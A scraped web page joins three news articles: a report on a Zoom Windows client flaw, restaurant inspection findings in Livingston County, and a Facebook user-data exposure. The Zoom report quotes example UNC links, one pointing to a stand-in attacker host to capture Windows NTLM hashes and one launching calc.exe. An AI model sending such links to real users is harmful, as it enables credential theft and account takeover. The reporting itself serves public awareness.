Windows flaw lets Zoom leak network credentials, runs code remotely – Security – iTnews

Popular video conferencing service Zoom has a high risk security issue in its Windows client that can be used for limited remote code execution and, worse, to capture and replay security tokens to access network resources, security researchers have found.

Matthew Hickey of cybersecurity firm Hacker House that specialises in penetration testing and vulnerability analysis, told iTnews that the Zoom Windows desktop client is vulnerable to a high risk Universal Naming Convention (UNC) injection flaw in how the app handles Uniform Resource Identifier paths.

“An attacker can inject a link such as attacker.computer.comcompany_salary.xlsx into the chat, should anyone click on the link it will expose their Windows username, domain name -or- computer name and a hashed version of their Windows password,” Hickey said..

“An attacker can replay those hashed password values and access services such as Microsoft Exchange, Outlook Webmail and Sharepoint,” he added.

Hickey tested a discovery from another researcher who goes by the _g0dmode moniker, and who noted it was possible to capture Windows network NT Lan Manager (NTLM) hashes using the flaw.

Expanding on the prior discovery of the vulnerability, Hickey told iTnews that it is possible to run commands and install malware on clients.

If an attacker tries to do that, newer versions of Windows will warn users that a remote code execution attack could be taking place.

For example, it is possible to trigger the classic Windows remote code execution proof of running the built in calculator app by sending a link like: 127.0.0.1C$WindowsSystem32Calc.exe

Alert dialogs are only displayed for executable files and commands however.

“If an attacker attempts to leak credentials, no such warning is displayed,” Hickey said.

Hickey demonstrated the credentials capture to iTnews.

The flaw affects Zoom’s Windows client only, Hickey said. On Apple’s macOS, the Zoom client doesn’t make the links clickable.

Despite the warnings when attackers attempt to run code remotely, Hickey said the flaw should be rated as a serious one.

“I would usually score this as a medium risk issue, however in light of the fact that the issue is easily exploited through “ZoomBombing” (guessing the meeting ID’s through brute-force) and more susceptible to exploitation in the working from home climate, I would advise that it is a high risk issue,” he said.

“The issue can be considered to be of increased risk as even though corporate and enterprise networks will typically filter the outgoing ports used to exploit this issue, those working at home will not be subject to the same protection,” Hickey added.

“Most home working users will not be subject to strict outbound network use like they typically are when working from a corporate network.”

Hickey explained that while there are internet providers that filter Windows ports to prevent the spread of malware, that is an exception and most home broadband and Internet access will permit outbound access to the ports needed to exploit a UNC related vulnerability.

He has reported the issue to Zoom via Twitter.

As its popularity has climbed with people and students working from home in coronavirus lockdowns, the security of Zoom has come under intense scrutiny.

Other researchers have found that Zoom’s Company Directory feature leaks email addresses and photos, and that the video conferencing app does not use end-to-end encryption to protect calls from interception.

The United States Federal Bureau of Investigation’s Boston office also issued an alert over the rash of ZoomBombing attacks, in which uninvited people hijack video conferences, in some cases exposing themselves and/or posting obscene material.

iTnews has sought comment from Zoom on the vulnerability and will update the story when it arrives.

Related posts

February 2020 restaurant inspections in Livingston County

February 2020 restaurant inspections in Livingston County

Jennifer Timar
Livingston Daily
Published 6:30 AM EST Mar 3, 2020

Of the Livingston County restaurants inspected in February 2020, priority and priority foundation violations were found at 29 locations. 

Each month, the Livingston County Health Department inspects some businesses and schools that serve food. 

The Livingston Daily publishes reports on the most serious violations — ones that could lead to contamination of food or increase the risk of transmitting a foodborne illness — as well as corrective measures taken.

Four priority violations were found at:

Hartland Sports Center

2755 Arena Drive, Hartland Township

There were three spray bottles not labeled as to their contents. The person in charge labeled the bottles properly at the time of the inspection. There was no soap at the hand sink. Soap was available upon the inspector’s return. There were no paper towels at the hand sink. A new shelf was not allowing staff to open the dispenser and refill. Upon the inspector’s return, there was a dispenser available and paper towels were stocked in the dispenser. There was no chlorine test kit available. The facility decided to use quaternary sanitizer instead.

Horseshoe Lounge

10100 W. Grand River Ave., Fowlerville

The dish machine was not dispensing the proper amount of sanitizer. It was suspected that the product was expired. A new container of sanitizer was added and proper sanitizer concentrations were restored. The hand sink in the main kitchen was soiled with food residue. Coleslaw and ranch dressing prepared on Feb. 3 were labeled with a discard date of Feb. 20. Foods that are time and temperature controlled for safety cannot be held more than seven days. A proper discard date label was attached at the time of the inspection. No detergent was being dispensed in the dish machine because the container was empty. A new detergent container was added at the time of the inspection.

RELATED: 15 most common restaurant violations in Livingston County

Three priority violations were found at:

440 W. Main Street, Brighton

A pan of cooked chicken wings was holding at 50 degrees in the grill line prep cooler. A container of coleslaw was holding at 46 degrees. Upon further investigation, other items were also holding in the 41-to-50 degree range. All refrigeration equipment was working properly. It was suspected that the food items were left out at room temperature during the prep process. Some of the items are transferred from the basement walk-in unit on rolling carts. Those items may have been sitting on the cart for an extended period of time at room temperature. A tall plastic container of grits was cooling in an ice bath. The product was placed into an ice bath approximately 20 minutes earlier and was still approximately 200 degrees. The grits were transferred to a large shallow metal pan for proper cooling. Short ribs prepared two days prior to the inspection were cooled in a deep pan. No temperature violations were confirmed, but this method will not likely ensure proper cooling. Two refillable spray bottles containing cleaning chemicals were not labeled. The bottles were labeled at the time of inspection.

An infographic shows proper temperatures food should be held at to minimize the risk of foodborne illness.
Livingston County Health Department

Great Lakes Family Restaurant

963 S. Grand Ave., Fowlerville

Home-prepared foods were being stored in the walk-in cooler. The items included several 5-gallon buckets of cut tomatoes in a vinegar solution, which were prepared by a family member. The items were removed at the time of inspection. A pie cooler was holding food at 50 degrees. Cream pies and cheesecake were discarded. The pie cooler has been taken out of service and a new unit was ordered. Cream pies are now stored in another unit. A refillable spray bottle containing a chemical degreasing solution did not have a label. Proper chemical labeling was observed upon the inspector’s return.

Jimmy John’s

1504 Lawson Drive, Howell

An employee touched the computer ordering screen while wearing food handling gloves. They returned to prep food without changing the glove. Several employees did not wash their hands before wearing new food handling gloves. Both hand sinks were blocked by equipment. One hand sink was being used to store a water pitcher for the bread-making equipment. The other hand sink contained a sanitizer bottle.  The items were removed at the time of the inspection.

8515 W. Grand River Ave., Brighton

There were multiple employees improperly washing their hands. One employee washed their hands less than the required time and proceeded to use their pants to dry their hands. Another employee washed their hands less than the required time and did not dry their hands. Multiple employees changed soiled gloves but did not wash their hands properly as there were no paper towels to be found at any of the hand sinks in the kitchen. There was shredded lettuce on the line without time stamps. There were no paper towels at either hand sink in the kitchen. An employee was sent to the store during the inspection.

Mimi’s Diner

5589 E. M-36, Pinckney

There was rice in the steam table that had been placed there about an hour and 45 minutes prior. It was at 120 degrees. The steam table should not be used to reheat foods because it takes too long. It was reheated properly to over 165 degrees in the microwave oven and placed back into the steam table. The chlorine sanitizer concentration in the dish machine was too high. It was adjusted. Foods were being improperly cooled in the walk-in cooler. Mashed potatoes and rice were in containers 6-to-8 inches deep with the plastic wrap slightly uncovered on the edge. The rice was already cold, but the potatoes had been placed there an hour and half before and were at 100 degrees. They were moved to uncovered shallow pans. Sausage patties were being cooled in a covered shallow pan and were at 67 degrees. The cover was removed so that the heat was not trapped in. 

Old Hickory Bar

7071 Bennett Lake Road, Fenton

The cooler next to the fryer was holding food at 49 degrees. Deli meat, sliced tomatoes, burger patties and dressing were discarded. Upon the inspector’s return, there were no items in the cooler at time of inspection, but the ambient air read a proper 40 degrees. The in-use knives and utensils were being switched out every shift, which is typically eight hours. The in-use utensils that are in contact with food that is time and temperature controlled for safety need to be washed, rinsed and sanitized at least every four hours. Raw beef was stored in the walk-in cooler above bottled drinks. It was moved away from ready-to-eat food.

MORE: Chiropractic, massage clinic opens on Cleary campus

MORE: Brighton bakery to be featured on Home Shopping Network

Two priority violations were found at:

Jersey Giant Subs

3813 Tractor Drive, Howell

Tomatoes and lettuce had been put out at 11 a.m. and 1 p.m., respectively, but were not marked to indicate the time they were removed from the cooler and the time they must be discarded (4 hours later). They were marked during the inspection. The hand sink in the dish-washing area was blocked by buckets and a cart. They were moved.

Jets Pizza

120 W. Highland Road, Suite 800, Howell

A couple a bottles of cleaner were stored on the prep table near food. They were moved to the chemical storage room. Always store chemicals away from food and clean equipment. There were a couple spray bottles of sanitizer missing labels. They were labeled during the inspection.

Mary’s Fabulous Chicken & Fish

2429 E. Grand River Ave., Howell

A cook came into work, took an order, put food handling gloves on and made the food without washing his hands first. He washes his hands. Several onions in a bin in the walk-in cooler had white mold growth. All of the onions were discarded.

Snappers on the Water

6484 Bennett Lake Road, Fenton

There was a container of moldy food dated from December. It was discarded. There were some cans that were leaky and rusted. They were set aside to be returned.

St. John Catholic Church

2099 Hacker Road, Howell

The two-door cooler in the kitchen is holding food at 60 to 65 degrees. Sour cream, yogurt, milk and sauerkraut with sausage were discarded. There was a large pot of tomato sauce that was improperly cooled in a large container in the cooler. The cooler was broken. The sauce was at the same temperature as everything else (60 to 65 degrees). It was discarded.

Tubby’s Sub Shop

9912 E. Grand River Ave., Ste 500, Brighton

A food handler used gloves that touched raw meat to begin to assemble ready-to-eat sandwich ingredients. She was stopped and told that she must wash her hands and put a new pair of gloves on before touching ready-to eat food. She washed her hands and donned a new pair of gloves. The solution used to wipe down the cutting board contained too much chlorine. Water was added.

One priority violation was found at:

3949 W. Grand River Ave., Howell

A dicer in the cleaned dish area contained food particles. It was cleaned.

Brighton Coffeehouse and Theater

306 W. Main Street, Brighton

The automatic dish machine was calibrated for chlorine sanitizer, but the unit contained quaternary sanitizer. It resulted in sanitizer concentrations that were too weak. The quaternary sanitizer was removed and replaced with proper chlorine sanitizer. Proper sanitizer levels were restored.

Buffalo Wild Wings

9745 Village Place Blvd., Brighton

Foods in a prep cooler were holding 50 degrees in the upper compartment and 45 degrees in the lower compartment. Large metal containers of ranch and blue cheese dressings were holding at 50 degrees. The products were stored on ice, but the amount of ice was not adequate. Ranch and blue cheese dressings, cut tomatoes, cut lettuce, salsa and dairy products were discarded. Upon the inspector’s return, the cooler was repaired and a larger, taller ice bath was being used to hold dressings. 

Community Congregational U.C.C.

125 E. Unadilla Street, Pinckney

The dish machine was out of chlorine sanitizer. The container was tipped to the side to make sure that the machine was pulling the sanitizer, which it was. The bleach will be replaced before the next event.

Emagine Theater

10495 Hartland Square Road, Hartland Township

The dish machine was getting stuck in a cycle where it did not activate the hot water sanitizing cycle. It was repaired.

Hungry Howies

2560 E. Grand River Ave., Howell

An open container of grilled cooked chicken and sausage had a use-by date that had passed. It was discarded.

Jimmy John’s

750 W. Grand River Ave., Brighton

The facility uses both chlorine and quaternary sanitizers. However, only quaternary test strips were available. Chlorine test strips were purchased.

Mt. Brighton Resort

4141 Bauer Road, Brighton

No paper towels were available at the hand sink at Bruin’s Bar. Towels were provided at the time of inspection.

6995 W. Grand River Ave., Brighton

Hot dogs in a reach cooler were kept past their use-by date. They were discarded.

Stout Irish Pub

125 E. Grand River Ave., Brighton

Cooked cabbage, cooked pasta noodles and house-made pizza sauce were expired. The items were discarded.

Sunrise Family Diner

2375 E. Grand River Ave., Howell

A line cook cracked eggs, changed food handling gloves and put a new pair of gloves on before touching ready-to-eat food without washing their hands. 

Sushi Zen

114 W. Grand River Ave., Brighton

A staff member touched dirty dishes while loading them into the dish machine. He began to put clean dishes away without washing his hands.

Wendy’s

1022 S. Michigan Ave., Howell

An employee with painted fingernails was performing food-related tasks such as scooping fries without gloves on. 

Whispering Pines Golf Club

2500 Whispering Pines Drive, Pinckney

The interior of the ice machine had some mold growth. During the golf season it is routinely cleaned, but the club had not been open for a while. 

Wong Express House

9912 E. Grand River Ave., Brighton

A slicer had an accumulation of dried food on the back of the blade. It was taken apart to be cleaned. Grease accumulation was found in between and around equipment.

READ MORE LIVINGSTON COUNTY RESTAURANT INSPECTIONS:

Contact Livingston Daily reporter Jennifer Timar at 517-548-7148 or at jtimar@livingstondaily.com. Follow her on Facebook @Jennifer.Timar99 and Twitter @JenTimar99.

Related posts

Phone Numbers Of 267 Million Facebook Users Exposed Online In A Data Breach

Millions of Facebook users have had their data being exposed online. This follows a discovery by security researchers who found an unsecured database containing personal details to 267 million Facebook users. The database was reportedly left open for nearly two weeks.

It was first discovered on 14th December but was first indexed on 4th December.

The database contained personal information of users ranging from full names, phone numbers, and Facebook user IDs. Other details like payment information are said not to have been exposed.

The team – security researcher Bob Diachenko along with Comparitech, said that they discovered an unsecured Elasticsearch database rich in personal details of millions of Facebook users. The most affected users reside in the US. Users who have not set their profiles to private have been said to be the most affected ones.

The team already notified the host of the database, who has since pulled it offline. These data had already been shared on a hacker forum two days after it first appeared online on Dec 12th, according to Diachenko.

It is not yet known how these data were obtained, but the first theory trying to explain this is that the data may have been stolen from Facebook’s developer API. If that is true, then this might have happened before the company restricted developer access to users’ personal data like phone numbers in 2018.

Another way this data could have been obtained is through scraping. Or, the Facebook API may have a glitch that could still let developers access this type of data from users.

“A database this big is likely to be used for phishing and spam, particularly via SMS,” Diachenko said. “Facebook users should be on the lookout for suspicious text messages. Even if the sender knows your name or some basic information about you, be skeptical of any unsolicited messages.”

The researchers recommend that users should update their privacy settings to private which decreases the chance of their data being scraped.

Facebook has not commented on the matter, to date. This is, however, not the first time this is happening. Back in September, discovered an open server with hundreds of millions of phone numbers belonging to Facebook users.

Follow us on TelegramTwitterFacebook or  to ensure you don’t miss out on any future updates.

Related posts